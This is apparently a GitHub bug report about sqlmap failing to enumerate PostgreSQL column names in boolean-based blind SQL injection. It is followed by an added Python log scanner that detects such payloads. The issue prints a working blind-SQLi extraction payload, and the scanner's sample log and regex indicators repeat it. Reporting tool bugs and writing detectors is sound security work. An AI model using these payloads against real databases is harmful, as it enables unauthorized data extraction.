Unable to retrieve column names - Boolean-based Blind in PostgreSQL #4306

@victorcamposm

Describe the bug
sqlmap is not able to extract column names while exploiting boolean-based blind SQLi in PostgreSQL. It works smoothly for extracting database names, user, hostname, etc. Checking the verbose mode, the payload seems not to be working correctly.
The payload used by sqlmap (not working):

' AND ASCII(SUBSTRING((SELECT COUNT(attname) FROM pg_namespace,pg_type,pg_attribute b JOIN pg_class a ON pg_class.oid=pg_attribute.attrelid WHERE pg_class.relnamespace=pg_namespace.oid AND pg_type.oid=pg_attribute.atttypid AND attnum>0 AND pg_class.relname='<table_name>' AND nspname='<schema_name>')::text FROM 1 FOR 1))>0 AND 'CxED'='CxED

Working payload:

' AND ASCII(SUBSTRING((SELECT COUNT(attname) FROM pg_attribute b JOIN pg_class a ON a.oid=b.attrelid JOIN pg_type c ON c.oid=b.atttypid JOIN pg_namespace d ON a.relnamespace=d.oid WHERE b.attnum>0  AND a.relname='<table_name>' AND nspname='<schema_name>' LIMIT 1)::text FROM 1 FOR 1))>0 AND 'CxED'='CxED

To Reproduce

  1. Run sqlmap -r 1.sql --force-ssl --dbs --no-cast -D <schema_name> -T <table_name> --columns --technique B -v 3
  2. See error
    [ERROR] unable to retrieve the number of columns for table '<table_name>' in database '<schema_name>'

Expected behavior
Be able to extract column names, the same way it is extracting other information like schema name and others.

Running environment:

  • sqlmap version 1.2.4#stable
  • Installation method: apt
  • Operating system: Ubuntu 18.04
  • Python version 3.6.9

Target details:

  • DBMS: PostgreSQL
  • SQLi techniques found by sqlmap: boolean-based blind
  • WAF/IPS: N/A
  • Relevant console output [if any]
  • Exception traceback [if any]
    [ERROR] unable to retrieve the number of columns for table '<table_name>' in database '<schema_name>'

Additional context
While testing the payloads, I wrote my own script for exploiting the sql injection with the "fixed" payload. I put the link in case it is useful.
https://github.com/victorcamposm/sqlinjector
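The two payloads in this report share a recognisable shape in web server logs: an `ASCII(SUBSTRING(` character probe, references to PostgreSQL catalog tables, a `::text` cast and a closing `AND 'x'='x` tautology. The following is an added detection example, not code from the issue, from sqlmap or from the linked sqlinjector project; it parses constructed access-log lines (not taken from the report), URL-decodes each query parameter and flags the ones that match those indicators. The log format, indicator names and regular expressions are assumptions chosen for the example.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed sample access-log lines (not from the original issue). The third line carries a
# boolean-based blind payload in the same shape as the report's working payload; the fourth is
# a bare boolean condition probe; the first two are benign.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /items?id=42 HTTP/1.1" 200 512
10.0.0.5 - - [01/Jan/2024:10:00:02 +0000] "GET /items?id=42&sort=name HTTP/1.1" 200 512
10.0.0.9 - - [01/Jan/2024:10:00:03 +0000] "GET /items?id=42%27%20AND%20ASCII%28SUBSTRING%28%28SELECT%20COUNT%28attname%29%20FROM%20pg_attribute%20b%20JOIN%20pg_class%20a%20ON%20a.oid%3Db.attrelid%20WHERE%20b.attnum%3E0%20AND%20a.relname%3D%27users%27%29%3A%3Atext%20FROM%201%20FOR%201%29%29%3E0%20AND%20%27CxED%27%3D%27CxED HTTP/1.1" 200 512
10.0.0.9 - - [01/Jan/2024:10:00:04 +0000] "GET /items?id=42%27%20AND%20%27a%27%3D%27a HTTP/1.1" 200 512
"""

# Common-log-format request line (assumed format for this example).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"'
)

# Indicator patterns derived from the payload shape shown in the report (assumed names).
INDICATORS = {
    # character-by-character extraction primitive used by boolean-based blind techniques
    "char_probe": re.compile(r"ASCII\s*\(\s*SUBSTRING\s*\(", re.I),
    # PostgreSQL system catalog tables used to enumerate schema objects
    "pg_catalog": re.compile(r"\bpg_(attribute|class|namespace|type)\b", re.I),
    # PostgreSQL-specific cast syntax
    "pg_cast": re.compile(r"::\s*text\b", re.I),
    # closing tautology that keeps the injected condition true: AND 'CxED'='CxED
    "tautology": re.compile(r"\bAND\s+'(\w+)'\s*=\s*'\1\b", re.I),
}


def classify(indicators):
    """Map the set of matched indicators to a coarse verdict."""
    if "char_probe" in indicators and "tautology" in indicators:
        return "boolean-blind extraction"
    if "tautology" in indicators:
        return "boolean condition probe"
    return "suspicious"


def scan_parameters(line):
    """Return one finding per query parameter in the request line that trips an indicator."""
    m = LOG_RE.match(line)
    if not m:
        return []
    findings = []
    query = urlsplit(m.group("target")).query
    # parse_qsl splits on & and the first = per pair, then percent-decodes each part, so an
    # encoded '=' (%3D) inside a value stays inside that value.
    for name, value in parse_qsl(query, keep_blank_values=True):
        matched = [tag for tag, rx in INDICATORS.items() if rx.search(value)]
        if matched:
            findings.append({
                "ip": m.group("ip"),
                "param": name,
                "indicators": matched,
                "verdict": classify(matched),
            })
    return findings


def scan_log(text):
    """Scan every line of a log and collect the findings in order."""
    findings = []
    for line in text.splitlines():
        findings.extend(scan_parameters(line))
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['ip']} param={f['param']} {f['verdict']}: {', '.join(f['indicators'])}")
```

Decoding the parameter before matching matters: the payload arrives percent-encoded, so a pattern applied to the raw request line would miss `ASCII(SUBSTRING(` entirely. The verdict separates a full extraction attempt (probe plus tautology) from a lone tautology, which is what a scanner sends while it is still confirming that a parameter is injectable.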
